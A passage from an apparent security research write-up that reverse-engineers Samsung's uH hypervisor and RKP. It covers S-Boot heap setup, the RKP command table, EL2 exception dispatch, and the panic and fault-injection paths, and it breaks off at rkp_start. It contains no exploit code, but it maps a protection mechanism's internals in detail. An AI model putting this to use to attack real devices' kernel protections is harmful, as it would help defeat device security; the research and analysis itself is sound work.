We can see in the definition of the uh_handler_list
structure that the argument of the fault handler will be an instance of the uh_handler_data
structure, which contains the values of some EL2 system registers as well as the general registers stored in the uh_registers
structure.
typedef struct uh_registers {
u64 regs[31];
u64 sp;
u64 pc;
u64 pstate;
} uh_registers_t;
typedef struct uh_handler_data{
esr_t esr_el2;
u64 elr_el2;
u64 hcr_el2;
u64 far_el2;
u64 hpfar_el2;
uh_registers_t regs;
} uh_handler_data_t;
typedef struct uh_handler_list{
u64 uh_handler;
uh_handler_data_t uh_handler_data[NR_CPUS];
} uh_handler_list_t;
The uh_fault_handler
function will print information about the fault before calling do_mem_abort
and finally panic
.
void uh_fault_handler(void)
{
unsigned int cpu;
uh_handler_data_t *uh_handler_data;
u32 exception_class;
unsigned long flags;
struct pt_regs regs;
spin_lock_irqsave(&uh_fault_lock, flags);
cpu = smp_processor_id();
uh_handler_data = &uh_handler_list.uh_handler_data[cpu];
exception_class = uh_handler_data->esr_el2.ec;
if (!exception_class_string[exception_class]
|| exception_class > esr_ec_brk_instruction_execution)
exception_class = esr_ec_unknown_reason;
pr_alert("=============uH fault handler logging=============\n");
pr_alert("%s",exception_class_string[exception_class]);
pr_alert("[System registers]\n", cpu);
pr_alert("ESR_EL2: %x\tHCR_EL2: %llx\tHPFAR_EL2: %llx\n",
uh_handler_data->esr_el2.bits,
uh_handler_data->hcr_el2, uh_handler_data->hpfar_el2);
pr_alert("FAR_EL2: %llx\tELR_EL2: %llx\n", uh_handler_data->far_el2,
uh_handler_data->elr_el2);
memset(&regs, 0, sizeof(regs));
memcpy(&regs, &uh_handler_data->regs, sizeof(uh_handler_data->regs));
do_mem_abort(uh_handler_data->far_el2, (u32)uh_handler_data->esr_el2.bits, &regs);
panic("%s",exception_class_string[exception_class]);
}
The other two APP_INIT
commands are used during initialization of the hypervisor framework. They are not called by the kernel but by S-Boot before the kernel is actually loaded and executed.
In dtb_update
, S-Boot will call command #2 for each memory
node in the Device Tree Blob (DTB). The arguments of this call are the memory region address and its size. It will then call the command #4 with two pointers to local variables that will be filled by the hypervisor as arguments.
int64_t dtb_update(...) {
// ...
dtb_find_entries(dtb, "memory", j_uh_add_dynamic_region);
sprintf(path, "/reserved-memory");
offset = dtb_get_path_offset(dtb, path);
if (offset < 0) {
dprintf("%s: fail to get path [%s]: %d\n", "dtb_update_reserved_memory", path, offset);
} else {
heap_base = 0;
heap_size = 0;
dtb_add_reserved_memory(dtb, offset, 0x87000000, 0x200000, "el2_code", "el2,uh");
uh_call(0xC300C000, 4, &heap_base, &heap_size, 0, 0);
dtb_add_reserved_memory(dtb, offset, heap_base, heap_size, "el2_earlymem", "el2,uh");
dtb_add_reserved_memory(dtb, offset, 0x80001000, 0x1000, "kaslr", "kernel-kaslr");
if (get_env_var(FORCE_UPLOAD) == 5)
rmem_size = 0x2400000;
else
rmem_size = 0x1700000;
dtb_add_reserved_memory(dtb, offset, 0xC9000000, rmem_size, "sboot", "sboot,rmem");
}
// ...
}
int64_t uh_add_dynamic_region(int64_t addr, int64_t size) {
uh_call(0xC300C000, 2, addr, size, 0, 0);
return 0;
}
void uh_call(...) {
asm("hvc #0");
}
The command handler #2, which we named init_cmd_add_dynamic_region
, is used to add a range of DDR memory to the dynamic_regions
memlist, out of which will be carved the "dynamic heap" region of uH. S-Boot indicates to the hypervisor which physical memory regions it can access once DDR has been initialized.
int64_t init_cmd_add_dynamic_region(saved_regs_t* regs) {
// ...
// Ensure the dynamic heap allocator hasn't already been initialized.
if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
return -1;
}
// Add the given memory range to the dynamic regions memlist.
return memlist_add(&uh_state.dynamic_regions, regs->x2, regs->x3);
}
The command handler #4, which we named init_cmd_initialize_dynamic_heap
, is used to finalize the list of dynamic memory regions and initialize the dynamic heap allocator from it. S-Boot calls it once all DDR memory has been added using the previous command. This function verifies its arguments, sets the starting physical address of the kernel to the very lowest DDR memory address, and finally calls initialize_dynamic_heap
.
int64_t init_cmd_initialize_dynamic_heap(saved_regs_t* regs) {
// ...
// Ensure the dynamic heap allocator hasn't already been initialized.
if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
return -1;
}
// Set the start of kernel physical memory to the lowest DDR address.
PHYS_OFFSET = memlist_get_min_addr(&uh_state.dynamic_regions);
// Ensure the S-Boot pointers are not in hypervisor memory.
base = check_and_convert_kernel_input(regs->x2);
size = check_and_convert_kernel_input(regs->x3);
if (!base || !size) {
uh_log('L', "main.c", 188, "Wrong addr in dynamicheap : base: %p, size: %p", base, size);
return -1;
}
// Initialize the dynamic heap allocator.
return initialize_dynamic_heap(base, size, regs->x4);
}
initialize_dynamic_heap
will first compute the dynamic heap base address and size. If those values are provided by S-Boot, they are used directly. If the size is not provided, it is calculated automatically. If the base address is not provided, a DDR memory region of the right size is carved automatically. The function then calls dynamic_heap_initialize
, which saves the chosen range into global variables and initializes the list of heap chunks, similarly to the static heap allocator. It initializes three sparsemaps, physmap
, ro_bitmap
, and dbl_bitmap
, that we will be detailing later. Finally, it initializes the robuf_regions
memlist, the robuf
sparsemap, and allocates a buffer to contain read-only pages to be used by the kernel.
int64_t initialize_dynamic_heap(uint64_t* base, uint64_t* size, uint64_t flag) {
// Ensure the dynamic heap allocator hasn't already been initialized.
if (uh_state.dynamic_heap_inited) {
return -1;
}
// And mark it as initialized.
uh_state.dynamic_heap_inited = 1;
// The dynamic heap size can be provided by S-Boot, or calculated automatically.
if (flag) {
dynamic_heap_size = *size;
} else {
dynamic_heap_size = get_dynamic_heap_size();
}
// The dynamic heap base can be provided by S-Boot. In that case, the range provided is removed from the
// `dynamic_regions` memlist. Otherwise, a range of the requested size is automatically removed from the
// `dynamic_regions` memlist and is returned.
if (*base) {
dynamic_heap_base = *base;
if (memlist_remove(&uh_state.dynamic_regions, dynamic_heap_base, dynamic_heap_size)) {
uh_log('L', "main.c", 281, "[-] Dynamic heap address is not existed in memlist, base : %p", dynamic_heap_base);
return -1;
}
} else {
dynamic_heap_base = memlist_get_region_of_size(&uh_state.dynamic_regions, dynamic_heap_size, 0x200000);
}
// Actually initialize the dynamic heap allocator using the provided or computed base address and size.
dynamic_heap_initialize(dynamic_heap_base, dynamic_heap_size);
uh_log('L', "main.c", 288, "[+] Dynamic heap initialized base: %lx, size: %lx", dynamic_heap_base, dynamic_heap_size);
// Copy the dynamic heap base address and size back to S-Boot.
*base = dynamic_heap_base;
*size = dynamic_heap_size;
// Map the dynamic heap in the second stage at EL1 as writable.
mapped_start = dynamic_heap_base;
if (s2_map(dynamic_heap_base, dynamic_heap_size_0, UNKN1 | WRITE | READ, &mapped_start) < 0) {
uh_log('L', "main.c", 299, "s2_map returned false, start : %p, size : %p", mapped_start, dynamic_heap_size);
return -1;
}
// Create 3 new sparsemaps: `physmap`, `ro_bitmap` and `dbl_bitmap` mapping all the remaining DDR memory. The physmap
// internal entries are also added to the protected ranges as they are critical to the hypervisor security.
sparsemap_init("physmap", &uh_state.phys_map, &uh_state.dynamic_regions, 0x20, 0);
sparsemap_for_all_entries(&uh_state.phys_map, protected_ranges_add);
sparsemap_init("ro_bitmap", &uh_state.ro_bitmap, &uh_state.dynamic_regions, 1, 0);
sparsemap_init("dbl_bitmap", &uh_state.dbl_bitmap, &uh_state.dynamic_regions, 1, 0);
// Create a new memlist that will be used to allocate memory pages for page tables management. This memlist is
// initialized with all the remaining DDR memory.
memlist_init(&uh_state.page_allocator.list);
memlist_add(&uh_state.page_allocator.list, dynamic_heap_base, dynamic_heap_size);
// Create a new sparsemap mapping all the pages from the previous memlist.
sparsemap_init("robuf", &uh_state.page_allocator.map, &uh_state.page_allocator.list, 1, 0);
// Allocates a chunk of memory for the robuf allocator (RO pages for the kernel).
allocate_robuf();
// Unmap all the unused DDR memory that might remain below 0xa00000000.
regions_end_addr = memlist_get_max_addr(&uh_state.dynamic_regions);
if ((regions_end_addr >> 33) <= 4) {
s2_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
s1_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
}
return 0;
}
If the size is not provided by S-Boot, get_dynamic_heap_size
is called. It first calculates and sets the robuf
size: 1 MB per GB of DDR memory, plus 6 MB. Then it calculates and returns the dynamic heap size: 4 MB per GB of DDR memory, plus 6 MB, rounded up to a multiple of 2 MB.
uint64_t get_dynamic_heap_size() {
// ...
// Do some housekeeping on the memlist.
memlist_merge_ranges(&uh_state.dynamic_regions);
memlist_dump(&uh_state.dynamic_regions);
// Calculate a first dynamic size, depending on the amount of DDR memory, to be added to a fixed robuf size.
some_size1 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
set_robuf_size(some_size1 + 0x600000);
// Calculate a second and third dynamic sizes, to be added to the robuf size, to get the dynamic heap size.
some_size2 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
some_size3 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x200000);
dynamic_heap_size = some_size1 + 0x600000 + some_size2 + some_size3;
// Ceil the dynamic heap size to 0x200000 bytes.
return (dynamic_heap_size + 0x1fffff) & 0xffe00000;
}
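As a quick sanity check of the arithmetic above: for a hypothetical device with 4 GB of DDR memory, the robuf size would be 4 × 1 MB + 6 MB = 10 MB, and the dynamic heap size 4 × 4 MB + 6 MB = 22 MB, which is already a multiple of 2 MB, so the rounding leaves it unchanged.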
allocate_robuf
tries to allocate a region of robuf_size
from the dynamic heap allocator that was initialized moments ago. If that is not possible, it grabs the last contiguous chunk of memory available in the allocator. It then calls page_allocator_init
with this memory region as an argument. page_allocator_init
initializes the sparsemap and everything that the page allocator will use. The page allocator and the "robuf" region are what will be used by RKP for handing out read-only pages to the kernel (for the data protection feature, for example).
int64_t allocate_robuf() {
// ...
// Ensure the dynamic heap allocator has been initialized.
if (!uh_state.dynamic_heap_inited) {
uh_log('L', "page_allocator.c", 84, "Dynamic heap needs to be initialized");
return -1;
}
// Ceil the robuf size to the size of a page.
robuf_size = uh_state.page_allocator.robuf_size & 0xfffff000;
// Allocate the robuf from the dynamic heap allocator.
robuf_base = dynamic_heap_alloc(uh_state.page_allocator.robuf_size & 0xfffff000, 0x1000);
// If the allocation failed, use the last memory chunk from the dynamic heap allocator.
if (!robuf_base) {
dynamic_heap_alloc_last_chunk(&robuf_base, &robuf_size);
}
if (!robuf_base) {
uh_log('L', "page_allocator.c", 96, "Robuffer Alloc Fail");
return -1;
}
// Clear the data cache for all robuf addresses.
if (robuf_size) {
offset = 0;
do {
zero_data_cache_page(robuf_base + offset);
offset += 0x1000;
} while (offset < robuf_size);
}
// Finally, initialize the page allocator using the robuf memory region.
return page_allocator_init(&uh_state.page_allocator, robuf_base, robuf_size);
}
APP_RKP

The command handlers registered for APP_RKP are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | rkp_cmd_init | 0 |
0x01 | rkp_cmd_start | 1 |
0x02 | rkp_cmd_deferred_start | 1 |
0x03 | rkp_cmd_write_pgt1 | - |
0x04 | rkp_cmd_write_pgt2 | - |
0x05 | rkp_cmd_write_pgt3 | - |
0x06 | rkp_cmd_emult_ttbr0 | - |
0x07 | rkp_cmd_emult_ttbr1 | - |
0x08 | rkp_cmd_emult_doresume | - |
0x09 | rkp_cmd_free_pgd | - |
0x0A | rkp_cmd_new_pgd | - |
0x0B | rkp_cmd_kaslr_mem | 0 |
0x0D | rkp_cmd_jopp_init | 1 |
0x0E | rkp_cmd_ropp_init | 1 |
0x0F | rkp_cmd_ropp_save | 0 |
0x10 | rkp_cmd_ropp_reload | - |
0x11 | rkp_cmd_rkp_robuffer_alloc | - |
0x12 | rkp_cmd_rkp_robuffer_free | - |
0x13 | rkp_cmd_get_ro_bitmap | 1 |
0x14 | rkp_cmd_get_dbl_bitmap | 1 |
0x15 | rkp_cmd_get_rkp_get_buffer_bitmap | 1 |
0x17 | rkp_cmd_id_0x17 | - |
0x18 | rkp_cmd_set_sctlr_el1 | - |
0x19 | rkp_cmd_set_tcr_el1 | - |
0x1A | rkp_cmd_set_contextidr_el1 | - |
0x1B | rkp_cmd_id_0x1B | - |
0x20 | rkp_cmd_dynamic_load | - |
0x40 | rkp_cmd_cred_init | 1 |
0x41 | rkp_cmd_assign_ns_size | 1 |
0x42 | rkp_cmd_assign_cred_size | 1 |
0x43 | rkp_cmd_pgd_assign | - |
0x44 | rkp_cmd_cred_set_fp | - |
0x45 | rkp_cmd_cred_set_security | - |
0x46 | rkp_cmd_assign_creds | - |
0x48 | rkp_cmd_ro_free_pages | - |
0x4A | rkp_cmd_prot_dble_map | - |
0x4B | rkp_cmd_mark_ppt | - |
0x4E | rkp_cmd_set_pages_ro_tsec_jar | - |
0x4F | rkp_cmd_set_pages_ro_vfsmnt_jar | - |
0x50 | rkp_cmd_set_pages_ro_cred_jar | - |
0x51 | rkp_cmd_id_0x51 | 1 |
0x52 | rkp_cmd_init_ns | - |
0x53 | rkp_cmd_ns_set_root_sb | - |
0x54 | rkp_cmd_ns_set_flags | - |
0x55 | rkp_cmd_ns_set_data | - |
0x56 | rkp_cmd_ns_set_sys_vfsmnt | 5 |
0x57 | rkp_cmd_id_0x57 | - |
0x60 | rkp_cmd_selinux_initialized | - |
0x81 | rkp_cmd_test_get_par | 0 |
0x82 | rkp_cmd_test_get_wxn | 0 |
0x83 | rkp_cmd_test_ro_range | 0 |
0x84 | rkp_cmd_test_get_va_xn | 0 |
0x85 | rkp_check_vmm_unmapped | 0 |
0x86 | rkp_cmd_test_ro | 0 |
0x87 | rkp_cmd_id_0x87 | 0 |
0x88 | rkp_cmd_check_splintering_point | 0 |
0x89 | rkp_cmd_id_0x89 | 0 |
Let's take a look at command handler #0 called in uh_init
. It simply initializes the maximal number of times that each command can be called (enforced by the "checker" function) by calling the rkp_init_cmd_counts
function.
int64_t rkp_cmd_init() {
// Enable panic when a violation is detected.
rkp_panic_on_violation = 1;
// Initialize the counters of commands executions.
rkp_init_cmd_counts();
cs_init(&rkp_start_lock);
return 0;
}
An important part of a hypervisor is its exception handling code. These functions are called on various events: faulting memory accesses by the kernel, when the kernel executes an HVC instruction, etc. They can be found by looking at the vector table specified in the VBAR_EL2
register. We have seen in vmm_init
that the vector table is at vmm_vector_table
. From the ARMv8 specifications, we know it has the following structure:
Address | Exception Type | Description |
---|---|---|
+0x000 | Synchronous | Current EL with SP0 |
+0x080 | IRQ/vIRQ | |
+0x100 | FIQ/vFIQ | |
+0x180 | SError/vSError | |
+0x200 | Synchronous | Current EL with SPx |
+0x280 | IRQ/vIRQ | |
+0x300 | FIQ/vFIQ | |
+0x380 | SError/vSError | |
+0x400 | Synchronous | Lower EL using AArch64 |
+0x480 | IRQ/vIRQ | |
+0x500 | FIQ/vFIQ | |
+0x580 | SError/vSError | |
+0x600 | Synchronous | Lower EL using AArch32 |
+0x680 | IRQ/vIRQ | |
+0x700 | FIQ/vFIQ | |
+0x780 | SError/vSError |
Our device has a 64-bit kernel executing at EL1, so the hypervisor calls should be dispatched to the exception handler at vmm_vector_table+0x400
. But in the hypervisor, all the exception handlers end up calling the vmm_dispatch
function with different arguments.
void exception_handler(...) {
// ...
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
// ...
// Dispatch the exception to the VMM, passing it the exception level and type.
vmm_dispatch(<exc_level>, <exc_type>, &regs);
// Clear the local monitor and return to the caller.
asm("clrex");
asm("eret");
}
The level and type of the exception that has been taken are passed to vmm_dispatch
as arguments. For synchronous exceptions, it will call vmm_synchronous_handler
and panic if it returns a non-zero value. For all other exception types, it simply logs a message.
int64_t vmm_dispatch(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
// If another core has called `vmm_panic`, panic on this core too.
if (has_panicked) {
vmm_panic(level, type, regs, "panic on another core");
}
// Handle the exception depending on its type.
switch (type) {
case 0x0: /* Synchronous */
// For synchronous exception, call the appropriate handler and panic if handling failed.
if (vmm_synchronous_handler(level, type, regs)) {
vmm_panic(level, type, regs, "syncronous handler failed");
}
break;
case 0x80: /* IRQ/vIRQ */
uh_log('D', "vmm.c", 1132, "RKP_e3b85960");
break;
case 0x100: /* FIQ/vFIQ */
uh_log('D', "vmm.c", 1135, "RKP_6d732e0a");
break;
case 0x180: /* SError/vSError */
uh_log('D', "vmm.c", 1149, "RKP_3c71de0a");
break;
default:
return 0;
}
return 0;
}
vmm_synchronous_handler
first gets the exception class by reading the ESR_EL2
register:
- for HVC instruction executions, it calls uh_handle_command to dispatch them to the appropriate application command handler;
- for trapped system register writes, it calls other_msr_mrs_system to decide whether the write is allowed or not, and then resumes execution or panics depending on the function's return value;
- for data aborts coming from a lower EL caused by writes to the kernel page tables, it calls the rkp_lxpgt_write function corresponding to the target page table level. For translation faults at level 3, the fault is ignored if the address can be successfully translated (using AT S12E1R or AT S12E1W). For permission faults, the fault is ignored, and the TLBs are flushed if the address can be successfully translated (using AT S12E1W). Aborts with a zero faulting address are skipped, and all other aborts result in a panic.

int64_t vmm_synchronous_handler(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
// ESR_EL2, Exception Syndrome Register (EL2).
//
// EC, bits [31:26]: Indicates the reason for the exception that this register holds information about.
esr_el2 = get_esr_el2();
switch (esr_el2 >> 26) {
case 0x12: /* HVC instruction execution in AArch32 state */
case 0x16: /* HVC instruction execution in AArch64 state */
// For HVC instruction execution, check if the HVC ID starts with 0xc300cXXX.
if ((regs->x0 & 0xfffff000) == 0xc300c000) {
app_id = regs->x0;
cmd_id = regs->x1;
// Reset the injection value for the current CPU.
cpu_num = get_current_cpu();
if (cpu_num <= 7) {
uh_state.injections[cpu_num] = 0;
}
// Dispatch the call to the application command handler.
uh_handle_command(app_id, cmd_id, regs);
}
return 0;
case 0x18: /* Trapped MSR, MRS or Sys. ins. execution in AArch64 state */
// For trapped system register accesses, first ensure that it is a write. If that's the case, call a handler to
// decide whether the operation is allowed or not.
//
// The handler gets the value that was being written to the system register from the saved general registers.
// Depending on which system register is being written, it will check if specific bits have a fixed value. If the
// write operation is allowed, ELR_EL2 is updated to make it point to the next instruction. If the operation is
// denied, the hypervisor will panic.
//
// - Direction, bit [0] = 0: Write access, including MSR instructions.
// - Op0/Op2/Op1/CRn/Rt/CRm, bits[21:1]: Values from the issued instruction.
if ((esr_el2 & 1) == 0 && !other_msr_mrs_system(&regs->x0, esr_el2_1 & 0x1ffffff)) {
return 0;
}
vmm_panic(level, type, regs, "other_msr_mrs_system failure");
return 0;
case 0x20: /* Instruction Abort from a lower EL */
// ...
// For instruction aborts coming from a lower EL, if the bits patterns below all match and the number of
// instruction aborts skipped is less than 9, then the number is incremented and the abort is skipped.
//
// - IFSC, bits [5:0] = 0b000111: Translation fault, level 3.
// - S1PTW, bit [7] = 0b1: Fault on the stage 2 translation of an access for a stage 1 translation table walk.
// - EA, bit [9] = 0b0: Not an External Abort.
// - FnV, bit [10] = 0b0: FAR is valid.
// - SET, bits [12:11] = 0b00: Recoverable state (UER).
if (should_skip_prefetch_abort() == 1) {
return 0;
}
// If the faulting address is 0, the fault is injected back to be handled by EL1 and the injection value is set
// for the current CPU. Otherwise, the hypervisor panics.
if (!esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
print_vmm_registers(regs);
return 0;
}
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_from_a_lower_exception_level");
return 0;
case 0x21: /* Instruction Abort taken without a change in EL */
// For instruction aborts taken without a change in EL, meaning hypervisor faults, it panics.
uh_log('L', "vmm.c", 920, "esr abort iss: 0x%x", esr_el2 & 0x1ffffff);
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_taken_without_a_change_in_exception_level");
case 0x24: /* Data Abort from a lower EL */
// For data aborts coming from a lower EL, it first calls `rkp_fault` to try to detect page table writes. That is
// when the faulting instruction is in the kernel text and is a `str x2, [x1]`. In addition, the x1 register must
// point to a page table entry. Then, depending on the page table level, it calls a different function:
//
// - rkp_l1pgt_write for level 1 PTs.
// - rkp_l2pgt_write for level 2 PTs.
// - rkp_l3pgt_write for level 3 PTs.
//
// If the kernel page table write is allowed, the PC is advanced to the next instruction.
if (!rkp_fault(regs)) {
return 0;
}
// For translation faults at level 3, convert the faulting IPA into a kernel VA. Then call the `el1_va_to_pa`
// function that will use the AT S12E1R/W instruction to translate it to a PA, as if the access was coming from
// EL1. If the address can be translated successfully, we return immediately.
//
// DFSC, bits [5:0] = 0b000111: Translation fault, level 3.
if ((esr_el2 & 0x3f) == 0b000111) {
// HPFAR_EL2, Hypervisor IPA Fault Address Register.
//
// Holds the faulting IPA for some aborts on a stage 2 translation taken to EL2.
va = rkp_get_va(get_hpfar_el2() << 8);
cs_enter(&s2_lock);
// el1_va_to_pa returns 0 if the address can be translated.
res = el1_va_to_pa(va, &ipa);
if (!res) {
uh_log('L', "vmm.c", 994, "Skipped data abort va: %p, ipa: %p", va, ipa);
cs_exit(&s2_lock);
return 0;
}
cs_exit(&s2_lock);
}
// For permission faults at any level, convert the faulting IPA into a kernel VA. Then use the AT S12E1W
// instruction to translate it to a PA, as if the access was coming from EL1. If the address can be translated
// successfully, invalidate the TLBs and return immediately.
//
// - WnR, bit [6] = 0b1: Abort caused by an instruction writing to a memory location.
// - DFSC, bits [5:0] = 0b0011xx: Permission fault, any level.
if ((esr_el2 & 0x7c) == 0x4c) {
va = rkp_get_va(get_hpfar_el2() << 8);
at_s12e1w(va);
// PAR_EL1, Physical Address Register.
//
// F, bit [0] = 0: Successful address translation.
if ((get_par_el1() & 1) == 0) {
print_el2_state();
invalidate_entire_s1_s2_el1_tlb();
return 0;
}
}
// ...
// For all other aborts, call the same function as the other instruction aborts.
if (esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
vmm_panic(level, type, regs, "esr_ec_data_abort_from_a_lower_exception_level");
} else {
print_vmm_registers(regs);
}
return 0;
case 0x25: /* Data Abort taken without a change in EL */
// For data aborts taken without a change in EL, meaning hypervisor faults, it panics.
vmm_panic(level, type, regs, "esr_ec_data_abort_taken_without_a_change_in_exception_level");
return 0;
default:
return -1;
}
}
The vmm_panic
function, called when the hypervisor needs to panic, first logs the panic message, exception level, and type. If the MMU is disabled or the exception is not synchronous or taken from EL2, it then calls uh_panic
. Otherwise, it calls uh_panic_el1
.
crit_sec_t* vmm_panic(int64_t level, int64_t type, saved_regs_t* regs, char* message) {
// ...
uh_log('L', "vmm.c", 1171, ">>vmm_panic<<");
cs_enter(&panic_cs);
// Print the panic message.
uh_log('L', "vmm.c", 1175, "message: %s", message);
// Print the exception level.
switch (level) {
case 0x0:
uh_log('L', "vmm.c", 1179, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_EL0");
break;
case 0x200:
uh_log('L', "vmm.c", 1182, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_ELX");
break;
case 0x400:
uh_log('L', "vmm.c", 1185, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH64");
break;
case 0x600:
uh_log('L', "vmm.c", 1188, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH32");
break;
default:
uh_log('L', "vmm.c", 1191, "level: VMM_UNKNOWN\n");
break;
}
// Print the exception type.
switch (type) {
case 0x0:
uh_log('L', "vmm.c", 1197, "type: VMM_EXCEPTION_TYPE_SYNCHRONOUS");
break;
case 0x80:
uh_log('L', "vmm.c", 1200, "type: VMM_EXCEPTION_TYPE_IRQ_OR_VIRQ");
break;
case 0x100:
uh_log('L', "vmm.c", 1203, "type: VMM_SYSCALL\n");
break;
case 0x180:
uh_log('L', "vmm.c", 1206, "type: VMM_EXCEPTION_TYPE_SERROR_OR_VSERROR");
break;
default:
uh_log('L', "vmm.c", 1209, "type: VMM_UNKNOWN\n");
break;
}
print_vmm_registers(regs);
// SCTLR_EL1, System Control Register (EL1).
//
// M, bit [0] = 0b0: EL1&0 stage 1 address translation disabled.
if ((get_sctlr_el1() & 1) == 0 || type != 0 /* Synchronous */ ||
(level == 0 /* Current EL with SP0 */ || level == 0x200 /* Current EL with SPx */)) {
has_panicked = 1;
cs_exit(&panic_cs);
// Reset the device immediately if the panic originated from another core.
if (!strcmp(message, "panic on another core")) {
exynos_reset(0x8800);
}
// Call `uh_panic` which will ultimately reset the device.
uh_panic();
}
// Call `uh_panic_el1` which will execute the registered kernel fault handler.
uh_panic_el1(uh_state.fault_handler, regs);
return cs_exit(&panic_cs);
}
uh_panic calls print_state_and_reset, which logs the EL1 and EL2 system register values, and the hypervisor and kernel stack contents. It copies a textual version of those into the "bigdata" region, and then reboots the device.
void uh_panic() {
uh_log('L', "main.c", 482, "uh panic!");
print_state_and_reset();
}
void print_state_and_reset() {
// Print debug values.
uh_log('L', "panic.c", 29, "count state - page_ro: %lx, page_free: %lx, s2_breakdown: %lx", page_ro, page_free,
s2_breakdown);
// Print EL2 system registers values.
print_el2_state();
// Print EL1 system registers values.
print_el1_state();
// Print the content of the hypervisor and kernel stacks.
print_stack_contents();
// Store this information for the analytics system.
bigdata_store_data();
// Reset the device.
has_panicked = 1;
exynos_reset(0x8800);
}
uh_panic_el1 fills the uh_handler_data structure, which we have seen previously, with the system and general register values. It then sets ELR_EL2 to the kernel fault handler so that it will be called upon executing the ERET instruction.
int64_t uh_panic_el1(uh_handler_list_t* fault_handler, saved_regs_t* regs) {
// ...
// Ensure that a kernel fault handler is registered.
uh_log('L', "vmm.c", 111, ">>uh_panic_el1<<");
if (!fault_handler) {
uh_log('L', "vmm.c", 113, "uH handler did not registered");
uh_panic();
}
// Print EL2 system registers values.
print_el2_state();
// Print EL1 system registers values.
print_el1_state();
// Print the content of the hypervisor and kernel stacks.
print_stack_contents();
// Set the injection value for the current CPU, unless it has already been set, in which case it panics.
cpu_num = get_current_cpu();
if (cpu_num <= 7) {
something = cpu_num - 0x21530000;
if (uh_state.injections[cpu_num] == something) {
uh_log('D', "vmm.c", 99, "Injection locked");
}
uh_state.injections[cpu_num] = something;
}
// Fill the `uh_handler_data` structure with the registers values.
handler_data = &fault_handler->uh_handler_data[cpu_num];
handler_data->esr_el2 = get_esr_el2();
handler_data->elr_el2 = get_elr_el2();
handler_data->hcr_el2 = get_hcr_el2();
handler_data->far_el2 = get_far_el2();
handler_data->hpfar_el2 = get_hpfar_el2() << 8;
if (regs) {
memcpy(fault_handler->uh_handler_data[cpu_num].regs.regs, regs, 272);
}
// Finally, set ELR_EL2 to the kernel fault handler to execute it on exception return.
set_elr_el2(fault_handler->uh_handler);
return 0;
}
Now that we have seen how the hypervisor is initialized and how exceptions are handled, let's see how the RKP-specific parts are started.
RKP startup is performed in two stages using two different commands:
- the RKP_START command is called in start_kernel, right after mm_init;
- the RKP_DEFERRED_START command is called in kernel_init, right before starting init.

On the kernel side, the first startup-related command is called in rkp_init.
static void __init rkp_init(void)
{
// ...
rkp_init_data.vmalloc_end = (u64)high_memory;
rkp_init_data.init_mm_pgd = (u64)__pa(swapper_pg_dir);
rkp_init_data.id_map_pgd = (u64)__pa(idmap_pg_dir);
rkp_init_data.tramp_pgd = (u64)__pa(tramp_pg_dir);
#ifdef CONFIG_UH_RKP_FIMC_CHECK
rkp_init_data.no_fimc_verify = 1;
#endif
rkp_init_data.tramp_valias = (u64)TRAMP_VALIAS;
rkp_init_data.zero_pg_addr = (u64)__pa(empty_zero_page);
// ...
uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}
This function fills a data structure of type rkp_init_t
that is given to the hypervisor. It contains information about the kernel memory layout.
rkp_init_t rkp_init_data __rkp_ro = {
.magic = RKP_INIT_MAGIC,
.vmalloc_start = VMALLOC_START,
.no_fimc_verify = 0,
.fimc_phys_addr = 0,
._text = (u64)_text,
._etext = (u64)_etext,
._srodata = (u64)__start_rodata,
._erodata = (u64)__end_rodata,
.large_memory = 0,
};
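For reference, here is an approximate definition of the rkp_init_t structure, reconstructed only from the fields that rkp_init fills above and that rkp_start reads below; the exact field order, the types, and any fields omitted here may differ between kernel versions.
typedef struct rkp_init {
  u32 magic;          /* RKP_INIT_MAGIC (0x5afe0001) or the test magic (0x5afe0002) */
  u64 vmalloc_start;  /* start of the vmalloc area */
  u64 vmalloc_end;    /* end of the vmalloc area (high_memory) */
  u64 init_mm_pgd;    /* PA of swapper_pg_dir */
  u64 id_map_pgd;     /* PA of idmap_pg_dir */
  u64 zero_pg_addr;   /* PA of empty_zero_page */
  u64 tramp_pgd;      /* PA of tramp_pg_dir */
  u64 tramp_valias;   /* VA of the trampoline page (TRAMP_VALIAS) */
  u32 no_fimc_verify; /* controls FIMC firmware verification */
  u64 fimc_phys_addr;
  u64 _text;          /* kernel text boundaries */
  u64 _etext;
  u64 _srodata;       /* kernel rodata boundaries */
  u64 _erodata;
  u32 large_memory;
} rkp_init_t;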
The rkp_init
function is called in start_kernel
, early in the kernel boot process.
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_init();
// ...
}
On the hypervisor side, the command handler simply ensures that it can't be called twice, and calls rkp_start
after taking the appropriate lock.
int64_t rkp_cmd_start(saved_regs_t* regs) {
// ...
cs_enter(&rkp_start_lock);
// Make sure RKP is not already started.
if (rkp_inited) {
cs_exit(&rkp_start_lock);
uh_log('L', "rkp.c", 133, "RKP is already started");
return -1;
}
// Call the actual startup function.
res = rkp_start(regs);
cs_exit(&rkp_start_lock);
return res;
}
The rkp_start
function saves all the information about the kernel memory layout into global variables. It initializes two memlists, executable_regions
which contains all the kernel executable regions (including the kernel text), and dynamic_load_regions
which is used for the "dynamic executable loading" feature that won't be detailed in this blog post. It also protects the kernel sections by calling the rkp_paging_init
function and processes the user page tables by calling rkp_l1pgt_process_table
.
int64_t rkp_start(saved_regs_t* regs) {
// ...
